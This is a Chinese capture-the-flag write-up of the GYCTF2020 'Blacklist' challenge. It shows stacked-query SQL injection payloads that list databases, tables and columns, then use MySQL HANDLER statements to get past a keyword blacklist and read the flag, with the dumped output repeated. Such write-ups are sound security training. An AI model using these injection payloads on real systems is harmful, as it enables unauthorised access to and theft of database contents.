[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记

启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it

随便输入几个关键词试试:select,他爆出来所有的黑名单关键词,本来还想fuzz跑一下的

return preg_match(\"/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\./i\",$inject);
return preg_match(\"/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\./i\",$inject);
return preg_match(\"/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\./i\",$inject);

联合注入不行,就尝试尝试堆叠查询,看来CTF也很喜欢考这类型的题目呀!

首先爆出数据库:1\';show databases;

array(1) {
[0]=>
string(11) \"ctftraining\"
}
array(1) {
[0]=>
string(18) \"information_schema\"
}
array(1) {
[0]=>
string(5) \"mysql\"
}
array(1) {
[0]=>
string(18) \"performance_schema\"
}
array(1) {
[0]=>
string(9) \"supersqli\"
}
array(1) {
[0]=>
string(4) \"test\"
}
array(1) {
  [0]=>
  string(11) \"ctftraining\"
}

array(1) {
  [0]=>
  string(18) \"information_schema\"
}

array(1) {
  [0]=>
  string(5) \"mysql\"
}

array(1) {
  [0]=>
  string(18) \"performance_schema\"
}

array(1) {
  [0]=>
  string(9) \"supersqli\"
}

array(1) {
  [0]=>
  string(4) \"test\"
}
array(1) { [0]=> string(11) \"ctftraining\" } array(1) { [0]=> string(18) \"information_schema\" } array(1) { [0]=> string(5) \"mysql\" } array(1) { [0]=> string(18) \"performance_schema\" } array(1) { [0]=> string(9) \"supersqli\" } array(1) { [0]=> string(4) \"test\" }

接着爆出表名:1\';show tables;

array(1) {
[0]=>
string(8) \"FlagHere\"
}
array(1) {
[0]=>
string(5) \"words\"
}
array(1) {
  [0]=>
  string(8) \"FlagHere\"
}

array(1) {
  [0]=>
  string(5) \"words\"
}
array(1) { [0]=> string(8) \"FlagHere\" } array(1) { [0]=> string(5) \"words\" }

然后查询列表信息:1\';show columns from FlagHere;

array(6) {
[0]=>
string(4) \"flag\"
[1]=>
string(12) \"varchar(100)\"
[2]=>
string(2) \"NO\"
[3]=>
string(0) \"\"
[4]=>
NULL
[5]=>
string(0) \"\"
}
array(6) {
  [0]=>
  string(4) \"flag\"
  [1]=>
  string(12) \"varchar(100)\"
  [2]=>
  string(2) \"NO\"
  [3]=>
  string(0) \"\"
  [4]=>
  NULL
  [5]=>
  string(0) \"\"
}
array(6) { [0]=> string(4) \"flag\" [1]=> string(12) \"varchar(100)\" [2]=> string(2) \"NO\" [3]=> string(0) \"\" [4]=> NULL [5]=> string(0) \"\" }

接下来的才是重点,在MYSQL数据库中:

  1. 可以用handler 【表名】 open来打开某个表
  2. 然后就可以在里面用handler 【表名】 read 【获取第几行】来获取该数据库里面的数据了
  3. 最后再利用handler【表名】 close来关闭

所以根据已知的信息可以构造payload为:

1\';
handler FlagHere open;
handler FlagHere read first;
handler FlagHere close;
1\';
handler FlagHere open;
handler FlagHere read first;
handler FlagHere close;
1\'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;
array(1) {
[0]=>
string(42) \"flag{bc0dd949-5b62-41c7-85c5-95662641a510}\"
}
array(1) {
  [0]=>
  string(42) \"flag{bc0dd949-5b62-41c7-85c5-95662641a510}\"
}
array(1) { [0]=> string(42) \"flag{bc0dd949-5b62-41c7-85c5-95662641a510}\" }

最终获得flag为flag{bc0dd949-5b62-41c7-85c5-95662641a510}

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
Forever facing sunlight, so you can not see the shadow of the.
永远面向阳光,这样你就看不见阴影了
评论 抢沙发

请登录后发表评论

    暂无评论内容